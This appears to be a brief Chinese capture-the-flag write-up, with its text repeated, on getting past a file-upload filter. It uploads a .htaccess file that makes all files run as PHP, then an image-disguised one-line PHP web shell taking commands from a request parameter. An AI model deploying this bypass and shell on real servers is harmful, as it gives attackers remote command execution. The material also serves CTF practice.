知识点:.htaccess 一句话马
目录
它过滤了ph后缀,不论大小写,还过滤了内容以<?开头的文件。
我们可以先传个.htaccess,把后面我们传上去的解析为php。
SetHandler application/x-httpd-php
上传图片
<script language='php'>assert($_REQUEST['cmd'])</script>
最后进入图片的上传目录webshell,拿flag
知识点:.htaccess 一句话马
它过滤了ph后缀,不论大小写,还过滤了内容以<?开头的文件。
我们可以先传个.htaccess,把后面我们传上去的解析为php。
SetHandler application/x-httpd-php
上传图片
<script language='php'>assert($_REQUEST['cmd'])</script>
最后进入图片的上传目录webshell,拿flag